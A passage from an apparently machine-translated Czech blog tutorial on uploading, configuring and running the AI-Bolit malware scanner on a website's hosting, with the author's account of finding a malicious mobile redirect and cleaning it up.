definovat ("PASS" , "?????????????????????????" );

define("PASS", "?????????????????????????");

A zadat místo symbolů??? jeho význam. Uložte soubor.

4. Poté zkopírujte celý obsah složky /ai-bolit/ na svůj hosting do kořenového adresáře (například pro WP se zde nachází wp-config).

5. Po nahrání skriptu na server je třeba spustit AI Bolit pomocí odkazu v adresním řádku prohlížeče:

https://your_site_address/ai-bolit.php?p=vaše_heslo

Po nějaké době obdržíte zprávu o antivirové kontrole na vašem hostingu.

V tomto příkladu se zdá, že kontrola odhalila podezřelé přesměrování pro mobilní zařízení umístěná v haccess, ale přidal jsem to sám. V některých souborech šablon byly také nalezeny kódy třetích stran (nejsou na snímku obrazovky, protože jsem již vše vyčistil).

6. Poté, co skener AI Bolit dokončí svou práci, musíte určitě odstranit všechny jeho soubory z FTP (který jste stáhli v kroku 4) spolu s přehledem.

Na závěr bych rád poznamenal, že skript obsahuje 2 režimy ověření: expresní a „paranoidní“. V prvním případě se kontrolují pouze soubory js, php, html a htaccess a druhý umožňuje rozběhnout AI Bolit naplno. Chcete-li to provést, v souboru nastavení ai-bolit.php nastavte hodnotu proměnné ‚scan_all_files‘ => 1 nebo použijte odkaz s dalším parametrem ke spuštění skriptu:

https://your_site_address/ai-bolit.php?p=your_password&full

V dokumentaci se píše, že před restartem je potřeba smazat AI-BOLIT-DOUBLECHECK.php, i když osobně jsem takový soubor na FTP neměl. V souboru readme.txt také naleznete informace o tom, jak zkontrolovat hostovaný web na přítomnost virů přes SSH. Algoritmus akcí je podobný, ale po zkopírování všech souborů skriptu na FTP jej spusťte příkazem:

php ai-bolit.php

V důsledku toho se automaticky vytvoří soubor AI-BOLIT-REPORT-<дата>-<время>.html s výsledky testů. V zásadě nejde o nic složitého, ale můžete se podívat na FAQ, kde najdete další odpovědi na otázky.

Obecně jsem byl schopen zkontrolovat web na viry pomocí AI Bolit poměrně snadno - problém jsem našel a vyřešil jsem jej asi za 10 minut. Stáhněte si skener zdarma odtud, poté musíte nakonfigurovat a spustit AI Bolit pomocí speciálního odkaz v prohlížeči a poté si prohlédněte výsledky. Jak opravit viry, zadní vrátka a shelly je trochu jiná otázka. V nejjednodušším případě (jako ten můj s přesměrováním) jednoduše ze souborů odstraníte škodlivý kód. Pokud tomu dobře nerozumíte nebo je úkol příliš komplikovaný, můžete požádat vývojáře skriptů o placenou konzultaci/službu. Pomohou nejen s odstraněním virů na vašem hostingu, ale také zlepší jeho ochranu.

Oblíbené v kategorii: